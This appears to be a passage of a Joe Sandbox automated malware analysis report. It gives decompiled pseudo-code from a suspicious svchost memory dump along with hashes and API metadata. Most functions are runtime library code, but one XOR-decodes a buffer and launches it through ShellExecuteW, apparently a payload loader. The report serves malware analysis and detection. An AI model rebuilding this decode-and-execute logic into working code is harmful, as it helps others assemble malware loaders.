                                                            				if (_t88 <= 0) goto 0xaf57255f;
                                                            				_t69 =  ~r15b + r10w;
                                                            				_t124 = _t69 - 0x39;
                                                            				if (_t124 <= 0) goto 0xaf57254d;
                                                            				_t70 = _t69 + 0xffffffff000000e7;
                                                            				 *_t205 = _t70;
                                                            				_t206 = _t205 + 1;
                                                            				r8w = r8w + 0xfffc;
                                                            				if (_t124 >= 0) goto 0xaf57252d;
                                                            				if (r8w < 0) goto 0xaf5725a9;
                                                            				_t96 = r8b;
                                                            				if (_t70 - 8 <= 0) goto 0xaf5725a9;
                                                            				_t28 = _t206 - 1; // 0x2
                                                            				_t178 = _t28;
                                                            				if (( *_t178 - 0x00000046 & 0x000000df) != 0) goto 0xaf57258e;
                                                            				 *_t178 = r10b;
                                                            				_t179 = _t178 - 1;
                                                            				goto 0xaf57257e;
                                                            				if (_t179 == _t239) goto 0xaf5725a6;
                                                            				_t73 =  *_t179;
                                                            				if (_t73 != 0x39) goto 0xaf5725a0;
                                                            				 *_t179 = 0xffffffff00000121;
                                                            				goto 0xaf5725a9;
                                                            				 *_t179 = _t73 + 1;
                                                            				goto 0xaf5725a9;
                                                            				 *((char*)(_t179 - 1)) =  *((char*)(_t179 - 1)) + 1;
                                                            				if (_t88 - 1 <= 0) goto 0xaf5725c4;
                                                            				_t75 = E0000022B22BAF563830(_t96, r10b, __edi, __esp, _t206, _t192, _t206, _t171);
                                                            				r10d = 0x30;
                                                            				_t208 =  ==  ? _t239 : _t206 + _t171;
                                                            				r15b =  ~r15b;
                                                            				asm("sbb al, al");
                                                            				 *_t208 = (_t75 & 0x000000e0) + 0x70;
                                                            				if ( *_t239 - r12b < 0) goto 0xaf5725f2;
                                                            				 *((char*)(_t208 + 1)) = 0x2b;
                                                            				_t209 = _t208 + 2;
                                                            				goto 0xaf5725fd;
                                                            				 *((char*)(_t209 + 1)) = 0x2d;
                                                            				_t210 = _t209 + 2;
                                                            				_t184 =  ~(( *_t216 >> 0x34) - _t219);
                                                            				 *_t210 = r10b;
                                                            				_t227 = _t210;
                                                            				if (_t184 - 0x3e8 < 0) goto 0xaf57263f;
                                                            				_t194 = (_t192 >> 7) + (_t192 >> 7 >> 0x3f);
                                                            				 *_t210 = __r10 + _t194;
                                                            				_t211 = _t210 + 1;
                                                            				_t185 = _t184 + _t194 * 0xfffffc18;
                                                            				if (_t211 != _t227) goto 0xaf572645;
                                                            				if (_t185 - 0x64 < 0) goto 0xaf572673;
                                                            				_t197 = (_t194 + _t185 >> 6) + (_t194 + _t185 >> 6 >> 0x3f);
                                                            				 *_t211 = __r10 + _t197;
                                                            				_t212 = _t211 + 1;
                                                            				if (_t212 != _t227) goto 0xaf57267e;
                                                            				if (_t185 + _t197 * 0xffffff9c - 0xa < 0) goto 0xaf5726a9;
                                                            				 *_t212 = __r10 + (_t197 >> 2) + (_t197 >> 2 >> 0x3f);
                                                            				_t213 = _t212 + 1;
                                                            				 *_t213 = (_t96 & 0x000007ff) + r10b;
                                                            				 *((intOrPtr*)(_t213 + 1)) = r12b;
                                                            				if (_v32 == r12b) goto 0xaf5726c8;
                                                            				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
                                                            				return r12d;
                                                            			}





















































                                                            0x22baf57238c
                                                            0x22baf57238c
                                                            0x22baf57238f
                                                            0x22baf572393
                                                            0x22baf572397
                                                            0x22baf57239b
                                                            0x22baf57239f
                                                            0x22baf5723b0
                                                            0x22baf5723b3
                                                            0x22baf5723b6
                                                            0x22baf5723c1
                                                            0x22baf5723c6
                                                            0x22baf5723cd
                                                            0x22baf5723d0
                                                            0x22baf5723d4
                                                            0x22baf5723e2
                                                            0x22baf5723e4
                                                            0x22baf5723e9
                                                            0x22baf5723e9
                                                            0x22baf5723ee
                                                            0x22baf5723f0
                                                            0x22baf5723f5
                                                            0x22baf57240c
                                                            0x22baf572418
                                                            0x22baf572420
                                                            0x22baf572424
                                                            0x22baf572427
                                                            0x22baf572432
                                                            0x22baf572437
                                                            0x22baf57243b
                                                            0x22baf572440
                                                            0x22baf572445
                                                            0x22baf572449
                                                            0x22baf57244b
                                                            0x22baf57244e
                                                            0x22baf57245b
                                                            0x22baf572463
                                                            0x22baf572472
                                                            0x22baf57247a
                                                            0x22baf57247c
                                                            0x22baf572480
                                                            0x22baf572492
                                                            0x22baf572494
                                                            0x22baf572497
                                                            0x22baf57249a
                                                            0x22baf5724aa
                                                            0x22baf5724c6
                                                            0x22baf5724d1
                                                            0x22baf5724d3
                                                            0x22baf5724d6
                                                            0x22baf5724e2
                                                            0x22baf5724eb
                                                            0x22baf5724ed
                                                            0x22baf5724f0
                                                            0x22baf5724f3
                                                            0x22baf5724f6
                                                            0x22baf5724fb
                                                            0x22baf5724fd
                                                            0x22baf572500
                                                            0x22baf572513
                                                            0x22baf572519
                                                            0x22baf57251f
                                                            0x22baf57252f
                                                            0x22baf572540
                                                            0x22baf572544
                                                            0x22baf572548
                                                            0x22baf57254a
                                                            0x22baf57254d
                                                            0x22baf572551
                                                            0x22baf572558
                                                            0x22baf57255d
                                                            0x22baf572563
                                                            0x22baf572568
                                                            0x22baf572578
                                                            0x22baf57257a
                                                            0x22baf57257a
                                                            0x22baf572584
                                                            0x22baf572586
                                                            0x22baf572589
                                                            0x22baf57258c
                                                            0x22baf572591
                                                            0x22baf572593
                                                            0x22baf572597
                                                            0x22baf57259c
                                                            0x22baf57259e
                                                            0x22baf5725a2
                                                            0x22baf5725a4
                                                            0x22baf5725a6
                                                            0x22baf5725ab
                                                            0x22baf5725b6
                                                            0x22baf5725be
                                                            0x22baf5725c7
                                                            0x22baf5725cb
                                                            0x22baf5725ce
                                                            0x22baf5725d4
                                                            0x22baf5725e6
                                                            0x22baf5725e8
                                                            0x22baf5725ec
                                                            0x22baf5725f0
                                                            0x22baf5725f2
                                                            0x22baf5725f6
                                                            0x22baf5725fa
                                                            0x22baf5725fd
                                                            0x22baf572600
                                                            0x22baf57260a
                                                            0x22baf572624
                                                            0x22baf57262b
                                                            0x22baf57262d
                                                            0x22baf572637
                                                            0x22baf57263d
                                                            0x22baf572643
                                                            0x22baf572660
                                                            0x22baf572667
                                                            0x22baf572669
                                                            0x22baf572676
                                                            0x22baf57267c
                                                            0x22baf57269d
                                                            0x22baf57269f
                                                            0x22baf5726ac
                                                            0x22baf5726ae
                                                            0x22baf5726ba
                                                            0x22baf5726c1
                                                            0x22baf5726e8

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: gfffffff
                                                            • API String ID: 3215553584-1523873471
                                                            • Opcode ID: 9a00b7d015ee79e1782b76473061e7a9280a011899ea1bca82edb2c9d518c6c5
                                                            • Instruction ID: ae4a99bb53d45859cb6a3a6c82b13d090e5f6d2e4cacbf6b9a84c7229b85fc80
                                                            • Opcode Fuzzy Hash: 9a00b7d015ee79e1782b76473061e7a9280a011899ea1bca82edb2c9d518c6c5
                                                            • Instruction Fuzzy Hash: 8A9157637053C596EF368F69A14C3D97BA5A325BD0F048522CB9907B97DF3AC511CB01
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF5727BC(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                            				void* _t11;
                                                            				void* _t13;
                                                            				intOrPtr* _t21;
                                                            				intOrPtr* _t35;
                                                            
                                                            				_t21 = _t35;
                                                            				 *((long long*)(_t21 + 8)) = __rbx;
                                                            				 *((long long*)(_t21 + 0x10)) = __rbp;
                                                            				 *((long long*)(_t21 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t21 + 0x20)) = __rdi;
                                                            				r15b = r9b;
                                                            				_t10 =  >  ? __ebx : 0;
                                                            				_t11 = ( >  ? __ebx : 0) + 9;
                                                            				if (__rdx - _t21 > 0) goto 0xaf572821;
                                                            				_t13 = E0000022B22BAF567054(_t21);
                                                            				 *_t21 = 0x22;
                                                            				E0000022B22BAF564328(_t13);
                                                            				return 0x22;
                                                            			}







                                                            0x22baf5727bc
                                                            0x22baf5727bf
                                                            0x22baf5727c3
                                                            0x22baf5727c7
                                                            0x22baf5727cb
                                                            0x22baf5727dd
                                                            0x22baf5727e6
                                                            0x22baf5727e9
                                                            0x22baf5727f1
                                                            0x22baf5727f3
                                                            0x22baf5727fd
                                                            0x22baf5727ff
                                                            0x22baf572820

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: e+000$gfff
                                                            • API String ID: 3215553584-3030954782
                                                            • Opcode ID: cdac167fcf2129b826a62c04b971c9004cfc57662dbad9fc748fd4d6a083cdd7
                                                            • Instruction ID: 8b97e116342dd4e23aa9cb776c36784c5e34a8f64fa00fc4c35e1ec72219f6fa
                                                            • Opcode Fuzzy Hash: cdac167fcf2129b826a62c04b971c9004cfc57662dbad9fc748fd4d6a083cdd7
                                                            • Instruction Fuzzy Hash: 535106637147C0A6EB768FB59949399BB91E341B90F0C9625D6A847BD7CF3EC084CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E0000022B22BAF5336D0(void* __eax, void* __edx, long long __rcx, long long __rdi, long long __rsi, long long __r8, long long __r14, long long __r15, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                            				void* _v24;
                                                            				void* _v32;
                                                            				void* _v40;
                                                            				void* _v64;
                                                            				intOrPtr _v72;
                                                            				void* _v80;
                                                            				void* _v88;
                                                            				long long _v104;
                                                            				void* _t59;
                                                            				long long _t100;
                                                            				intOrPtr* _t105;
                                                            				intOrPtr* _t110;
                                                            				intOrPtr* _t112;
                                                            				intOrPtr* _t113;
                                                            				intOrPtr* _t114;
                                                            				intOrPtr* _t115;
                                                            				void* _t125;
                                                            				void* _t128;
                                                            				void* _t139;
                                                            
                                                            				_t139 = _t128;
                                                            				 *((long long*)(_t139 + 8)) = __rcx;
                                                            				 *((long long*)(_t139 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t139 - 0x18)) = __rdi;
                                                            				 *((long long*)(_t139 - 0x20)) = __r14;
                                                            				 *((long long*)(_t139 - 0x28)) = __r15;
                                                            				_v80 = _t100;
                                                            				_t75 =  >=  ? __edx : 0;
                                                            				_v88 = _t100;
                                                            				_a8 = _t100;
                                                            				 *((long long*)(_t139 - 0x68)) =  &_v80;
                                                            				_t11 = _t100 + 1; // 0x1
                                                            				r8d = _t11;
                                                            				__imp__CoCreateInstance(_t100, _t125);
                                                            				if (__eax < 0) goto 0xaf533831;
                                                            				r9d = 0;
                                                            				if ( *((intOrPtr*)( *_v80 + 0x18))() != 0) goto 0xaf533831;
                                                            				_t15 = _t100 + 8; // 0x8
                                                            				r15d = _t15;
                                                            				_t105 = _a8;
                                                            				if (_t105 == 0) goto 0xaf533773;
                                                            				_a8 = _t100;
                                                            				 *((intOrPtr*)( *_t105 + 0x10))();
                                                            				if ( *((intOrPtr*)( *_v88 + 0x18))() != 0) goto 0xaf533831;
                                                            				_a32 = _t100;
                                                            				_v104 =  &_a32;
                                                            				r8d = 0;
                                                            				if ( *((intOrPtr*)( *_a8 + 0x48))() < 0) goto 0xaf5337ea;
                                                            				_v72 = r15w;
                                                            				r9d = 0;
                                                            				if ( *((intOrPtr*)( *_a32 + 0x18))() < 0) goto 0xaf5337ea;
                                                            				__imp__#6();
                                                            				_t83 = 0 - ( >=  ? __edx : 0);
                                                            				if (0 == ( >=  ? __edx : 0)) goto 0xaf533802;
                                                            				_t110 = _a32;
                                                            				if (_t110 == 0) goto 0xaf533760;
                                                            				 *((intOrPtr*)( *_t110 + 0x10))();
                                                            				goto 0xaf533760;
                                                            				r8d = 0;
                                                            				_v104 = __r8;
                                                            				_t59 =  *((intOrPtr*)( *_a8 + 0x40))();
                                                            				_t112 = _a32;
                                                            				if (_t112 == 0) goto 0xaf533831;
                                                            				 *((intOrPtr*)( *_t112 + 0x10))();
                                                            				_t113 = _a8;
                                                            				if (_t113 == 0) goto 0xaf533857;
                                                            				 *((intOrPtr*)( *_t113 + 0x10))();
                                                            				_t114 = _v88;
                                                            				if (_t114 == 0) goto 0xaf533866;
                                                            				 *((intOrPtr*)( *_t114 + 0x10))();
                                                            				_t115 = _v80;
                                                            				if (_t115 == 0) goto 0xaf533875;
                                                            				 *((intOrPtr*)( *_t115 + 0x10))();
                                                            				return 0 | _t59 > 0x00000000;
                                                            			}






















                                                            0x22baf5336d0
                                                            0x22baf5336d3
                                                            0x22baf5336e2
                                                            0x22baf5336e8
                                                            0x22baf5336ec
                                                            0x22baf5336f7
                                                            0x22baf5336fd
                                                            0x22baf533701
                                                            0x22baf533704
                                                            0x22baf53370a
                                                            0x22baf533715
                                                            0x22baf533719
                                                            0x22baf533719
                                                            0x22baf533724
                                                            0x22baf53372c
                                                            0x22baf53373a
                                                            0x22baf53374c
                                                            0x22baf533754
                                                            0x22baf533754
                                                            0x22baf533760
                                                            0x22baf533767
                                                            0x22baf533769
                                                            0x22baf533770
                                                            0x22baf53378c
                                                            0x22baf53379a
                                                            0x22baf5337a5
                                                            0x22baf5337aa
                                                            0x22baf5337b7
                                                            0x22baf5337c1
                                                            0x22baf5337cd
                                                            0x22baf5337d8
                                                            0x22baf5337de
                                                            0x22baf5337e4
                                                            0x22baf5337e6
                                                            0x22baf5337ea
                                                            0x22baf5337f1
                                                            0x22baf5337fa
                                                            0x22baf5337fd
                                                            0x22baf53380d
                                                            0x22baf533810
                                                            0x22baf53381a
                                                            0x22baf53381d
                                                            0x22baf533829
                                                            0x22baf53382e
                                                            0x22baf533831
                                                            0x22baf53384f
                                                            0x22baf533854
                                                            0x22baf533857
                                                            0x22baf53385e
                                                            0x22baf533863
                                                            0x22baf533866
                                                            0x22baf53386d
                                                            0x22baf533872
                                                            0x22baf53387d

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFreeInstanceString
                                                            • String ID: FriendlyName
                                                            • API String ID: 586785272-3623505368
                                                            • Opcode ID: ee5a44b920a0522c40d0ec1c858e5ecd1c02b6a9db021fab092d16394c70930e
                                                            • Instruction ID: 0d4f0bd79a7c5892e587ca4cb73f7de58553cb16ea20aecf4469b7568bafe7e4
                                                            • Opcode Fuzzy Hash: ee5a44b920a0522c40d0ec1c858e5ecd1c02b6a9db021fab092d16394c70930e
                                                            • Instruction Fuzzy Hash: 23515537701B5496EB25CFAAD49869C77A4FB84F88B555126DE0E43B28CF36C849C340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF559180(long long __rbx, intOrPtr* __rcx, void* __rdx, long long _a8) {
                                                            				void* _t10;
                                                            				intOrPtr* _t30;
                                                            				intOrPtr _t33;
                                                            				unsigned long long _t35;
                                                            				intOrPtr _t39;
                                                            				signed long long _t41;
                                                            				long long* _t44;
                                                            				intOrPtr _t53;
                                                            
                                                            				_a8 = __rbx;
                                                            				_t30 = __rcx;
                                                            				_t39 =  *((intOrPtr*)(__rcx + 8));
                                                            				if (__rdx - _t39 >= 0) goto 0xaf559240;
                                                            				_t53 =  *__rcx;
                                                            				if (_t53 - __rdx > 0) goto 0xaf559240;
                                                            				_t33 =  *((intOrPtr*)(__rcx + 0x10));
                                                            				if (_t39 != _t33) goto 0xaf559219;
                                                            				if (_t33 - _t39 >> 3 - 1 >= 0) goto 0xaf559219;
                                                            				_t41 = _t39 - _t53 >> 3;
                                                            				if (0xffffffff - _t41 - 1 < 0) goto 0xaf5592c7;
                                                            				_t35 = _t33 - _t53 >> 3;
                                                            				r9d = 0;
                                                            				_t54 =  >=  ? (_t35 >> 1) + _t35 : _t53;
                                                            				_t43 =  >=  ?  >=  ? (_t35 >> 1) + _t35 : _t53 : _t41 + 1;
                                                            				_t10 = E0000022B22BAF559AD0(__rcx, __rcx,  >=  ?  >=  ? (_t35 >> 1) + _t35 : _t53 : _t41 + 1);
                                                            				_t44 =  *((intOrPtr*)(_t30 + 8));
                                                            				if (_t44 == 0) goto 0xaf5592b7;
                                                            				 *_t44 =  *((intOrPtr*)( *_t30 + (__rdx - _t53 >> 3) * 8));
                                                            				 *((long long*)(_t30 + 8)) =  *((long long*)(_t30 + 8)) + 8;
                                                            				return _t10;
                                                            			}











                                                            0x22baf559180
                                                            0x22baf55918d
                                                            0x22baf559190
                                                            0x22baf559197
                                                            0x22baf55919d
                                                            0x22baf5591a3
                                                            0x22baf5591a9
                                                            0x22baf5591b7
                                                            0x22baf5591c7
                                                            0x22baf5591d6
                                                            0x22baf5591e4
                                                            0x22baf5591f0
                                                            0x22baf5591f4
                                                            0x22baf559209
                                                            0x22baf559210
                                                            0x22baf559214
                                                            0x22baf559219
                                                            0x22baf559220
                                                            0x22baf55922d
                                                            0x22baf559230
                                                            0x22baf55923f

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_
                                                            • String ID: vector<T> too long
                                                            • API String ID: 909987262-3788999226
                                                            • Opcode ID: 3593639ad2ffb16ee7440c00a7546e136af8ae350d2d2a0137a1f388cb4cd2ea
                                                            • Instruction ID: 768b5e89edba419ad935c61cbf6927048e49441eba2307cb3a23906f0bfde42b
                                                            • Opcode Fuzzy Hash: 3593639ad2ffb16ee7440c00a7546e136af8ae350d2d2a0137a1f388cb4cd2ea
                                                            • Instruction Fuzzy Hash: 4631C4B3720B8C51EE158BE9E61C6ECB351E394BE4F589221DA2E0BBD6DF6DD1418340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_
                                                            • String ID: vector<T> too long
                                                            • API String ID: 909987262-3788999226
                                                            • Opcode ID: b571931390e4ef176ca0175cb6605a2e306690df78c5dec5d51de02c19888cef
                                                            • Instruction ID: a8e38e05ea5e3d1bf0223a13e2f786ae1019ea1fe0907bd56e08a74da14036ef
                                                            • Opcode Fuzzy Hash: b571931390e4ef176ca0175cb6605a2e306690df78c5dec5d51de02c19888cef
                                                            • Instruction Fuzzy Hash: F631EA6372068491EE258FEAE52C2E9B351D349BF4F24A720D93D1BBDADF6DD1404340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E0000022B22BAF533E10(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                            				void* _t28;
                                                            				void* _t33;
                                                            				void* _t35;
                                                            				void* _t36;
                                                            				void* _t37;
                                                            				intOrPtr _t53;
                                                            				intOrPtr* _t58;
                                                            				signed long long _t61;
                                                            				intOrPtr* _t63;
                                                            				signed long long _t75;
                                                            				intOrPtr* _t78;
                                                            				signed long long _t88;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_a24 = __rdi;
                                                            				_t53 =  *((intOrPtr*)(__rdx + 0x10));
                                                            				_t88 = __r8;
                                                            				_t78 = __rdx;
                                                            				_t58 = __rcx;
                                                            				if (_t53 - __r8 < 0) goto 0xaf533f24;
                                                            				_t75 =  >  ? _t53 - __r8 : __r9;
                                                            				if (__rcx != __rdx) goto 0xaf533e83;
                                                            				_t61 = __r8 + _t75;
                                                            				if ( *(__rcx + 0x10) - _t61 < 0) goto 0xaf533f31;
                                                            				 *(__rcx + 0x10) = _t61;
                                                            				if ( *((long long*)(__rcx + 0x18)) - 8 < 0) goto 0xaf533e6b;
                                                            				goto 0xaf533e6e;
                                                            				 *((short*)(__rcx + _t61 * 2)) = 0;
                                                            				_t28 = E0000022B22BAF534130(__rcx, __rcx, __rcx, __r8);
                                                            				goto 0xaf533f0b;
                                                            				if (_t75 - 0xfffffffe > 0) goto 0xaf533f3e;
                                                            				if ( *((intOrPtr*)(__rcx + 0x18)) - _t75 >= 0) goto 0xaf533ec3;
                                                            				E0000022B22BAF533F50(_t28, _t33, __rcx, __rcx, _t75,  *(__rcx + 0x10));
                                                            				if (_t75 == 0) goto 0xaf533f0b;
                                                            				if ( *((long long*)(_t78 + 0x18)) - 8 < 0) goto 0xaf533eb7;
                                                            				if ( *((long long*)(_t58 + 0x18)) - 8 < 0) goto 0xaf533edd;
                                                            				_t63 =  *_t58;
                                                            				goto 0xaf533ee0;
                                                            				if (_t75 != 0) goto 0xaf533ead;
                                                            				 *((long long*)(_t63 + 0x10)) = 0xfffffffe;
                                                            				if ( *((long long*)(_t63 + 0x18)) - 8 < 0) goto 0xaf533ed8;
                                                            				 *((short*)( *_t63)) = 0;
                                                            				goto 0xaf533f0b;
                                                            				if (_t75 == 0) goto 0xaf533ef2;
                                                            				E0000022B22BAF562BA0(_t33, _t35, _t36, _t37, _t58,  *_t78 + _t88 * 2, _t75,  *_t78, _t75 + _t75);
                                                            				 *(_t58 + 0x10) = _t75;
                                                            				if ( *((long long*)(_t58 + 0x18)) - 8 < 0) goto 0xaf533f02;
                                                            				goto 0xaf533f05;
                                                            				 *((short*)(_t58 + _t75 * 2)) = 0;
                                                            				return 0;
                                                            			}















                                                            0x22baf533e10
                                                            0x22baf533e15
                                                            0x22baf533e1a
                                                            0x22baf533e25
                                                            0x22baf533e2c
                                                            0x22baf533e2f
                                                            0x22baf533e32
                                                            0x22baf533e38
                                                            0x22baf533e44
                                                            0x22baf533e4b
                                                            0x22baf533e4d
                                                            0x22baf533e55
                                                            0x22baf533e5b
                                                            0x22baf533e64
                                                            0x22baf533e69
                                                            0x22baf533e70
                                                            0x22baf533e79
                                                            0x22baf533e7e
                                                            0x22baf533e90
                                                            0x22baf533e9a
                                                            0x22baf533ea3
                                                            0x22baf533eab
                                                            0x22baf533eb2
                                                            0x22baf533ebc
                                                            0x22baf533ebe
                                                            0x22baf533ec1
                                                            0x22baf533ec6
                                                            0x22baf533ecf
                                                            0x22baf533ed3
                                                            0x22baf533ed8
                                                            0x22baf533edb
                                                            0x22baf533ee3
                                                            0x22baf533eed
                                                            0x22baf533ef7
                                                            0x22baf533efb
                                                            0x22baf533f00
                                                            0x22baf533f07
                                                            0x22baf533f23

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_
                                                            • String ID: invalid string position$string too long
                                                            • API String ID: 909987262-4289949731
                                                            • Opcode ID: 15bd81ad7d9b0633510796e60dad112d28319fca4503710dab2adabb7bb79886
                                                            • Instruction ID: 09207b7589da1f3a8c4b47502849b731280f6a477d02c30258b2beea4b255ee1
                                                            • Opcode Fuzzy Hash: 15bd81ad7d9b0633510796e60dad112d28319fca4503710dab2adabb7bb79886
                                                            • Instruction Fuzzy Hash: 1531C533200B40A1EB36CB9DD5AC29D73A1F754BC4F905621DA1A87BAADF3AC551C380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 33%
                                                            			E0000022B22BAF540740(void* __ebp, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __rsi, void* __r9, long long _a8) {
                                                            				intOrPtr _v16;
                                                            				long long _v24;
                                                            				void* __rdi;
                                                            				intOrPtr* _t70;
                                                            				intOrPtr _t73;
                                                            				void* _t78;
                                                            				intOrPtr _t79;
                                                            				void* _t83;
                                                            
                                                            				_t78 = __rdx;
                                                            				_a8 = __rbx;
                                                            				 *((intOrPtr*)(__rcx + 0x40)) = 1;
                                                            				_t70 = __rcx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x18)) <= 0) goto 0xaf54077f;
                                                            				Sleep(??);
                                                            				if ( *((intOrPtr*)(__rcx + 0x40)) == 0) goto 0xaf540876;
                                                            				_t63 =  *__rcx;
                                                            				if (1 -  *((intOrPtr*)( *__rcx + 0x18)) < 0) goto 0xaf540760;
                                                            				if ( *((long long*)(__rcx + 0x28)) == 0) goto 0xaf540876;
                                                            				_t73 =  *__rcx;
                                                            				if ( *((intOrPtr*)(_t73 + 0x24)) <= 0) goto 0xaf540876;
                                                            				r8d =  *(_t73 + 0x4d) & 0x000000ff;
                                                            				r8d = r8d + ( *(_t73 + 0x4c) & 0x000000ff);
                                                            				r8d = r8d + ( *(_t73 + 0x4b) & 0x000000ff);
                                                            				r8d = r8d + ( *(_t73 + 0x4a) & 0x000000ff);
                                                            				E0000022B22BAF540430( *__rcx, __rcx, _t73, __rsi);
                                                            				if ( *((long long*)(__rcx + 0x28)) == 0) goto 0xaf5407f2;
                                                            				r8d =  *( *__rcx + 0x24);
                                                            				if (r8d == 0) goto 0xaf5407f2;
                                                            				if (r8d == 0) goto 0xaf5407f2;
                                                            				asm("o16 nop [eax+eax]");
                                                            				 *(_t78 +  *((intOrPtr*)(__rcx + 0x28))) =  *(_t78 +  *((intOrPtr*)(__rcx + 0x28))) ^ 0x0000004d;
                                                            				if (1 -  *( *__rcx + 0x24) < 0) goto 0xaf5407e0;
                                                            				_t79 =  *((intOrPtr*)(__rcx + 0x28));
                                                            				r8d =  *( *__rcx + 0x24);
                                                            				r9d = E0000022B22BAF540370( *__rcx, __rcx, _t63, _t79, _t63, _t83);
                                                            				if ( *((long long*)(_t70 + 0x28)) == 0) goto 0xaf540842;
                                                            				r8d =  *( *_t70 + 0x24);
                                                            				if (r8d == 0) goto 0xaf540842;
                                                            				if (r8d == 0) goto 0xaf540842;
                                                            				asm("o16 nop [eax+eax]");
                                                            				 *(_t79 +  *((intOrPtr*)(_t70 + 0x28))) =  *(_t79 +  *((intOrPtr*)(_t70 + 0x28))) ^ 0x0000004d;
                                                            				if (1 -  *( *_t70 + 0x24) < 0) goto 0xaf540830;
                                                            				if (r9d == 0) goto 0xaf54086e;
                                                            				_v16 = 1;
                                                            				_v24 = 0;
                                                            				ShellExecuteW(??, ??, ??, ??, ??, ??);
                                                            				E0000022B22BAF55A7E4( *_t70, _t63);
                                                            				return 0;
                                                            			}











                                                            0x22baf540740
                                                            0x22baf540740
                                                            0x22baf54074f
                                                            0x22baf540756
                                                            0x22baf54075c
                                                            0x22baf540765
                                                            0x22baf540771
                                                            0x22baf540777
                                                            0x22baf54077d
                                                            0x22baf540784
                                                            0x22baf54078a
                                                            0x22baf540791
                                                            0x22baf54079b
                                                            0x22baf5407a0
                                                            0x22baf5407a7
                                                            0x22baf5407ae
                                                            0x22baf5407b1
                                                            0x22baf5407be
                                                            0x22baf5407c3
                                                            0x22baf5407ca
                                                            0x22baf5407d1
                                                            0x22baf5407d7
                                                            0x22baf5407e4
                                                            0x22baf5407f0
                                                            0x22baf5407f8
                                                            0x22baf5407fc
                                                            0x22baf54080a
                                                            0x22baf54080d
                                                            0x22baf540812
                                                            0x22baf540819
                                                            0x22baf540820
                                                            0x22baf540826
                                                            0x22baf540834
                                                            0x22baf540840
                                                            0x22baf540845
                                                            0x22baf540852
                                                            0x22baf54085f
                                                            0x22baf540868
                                                            0x22baf540871
                                                            0x22baf540882

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExecuteShellSleep
                                                            • String ID: open
                                                            • API String ID: 4194306370-2758837156
                                                            • Opcode ID: 19b618c6e987b621b7023be04189832c73580cc368628f748922581f1536daea
                                                            • Instruction ID: a6cfb0a4946374448fab74c4545e35b70865a67827ac3bbb70d35297cad0a1d6
                                                            • Opcode Fuzzy Hash: 19b618c6e987b621b7023be04189832c73580cc368628f748922581f1536daea
                                                            • Instruction Fuzzy Hash: 24419E73A1065091DB768B6AC14D76C7BF2F788F89F658115CA0803BAADF3BC842CB44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
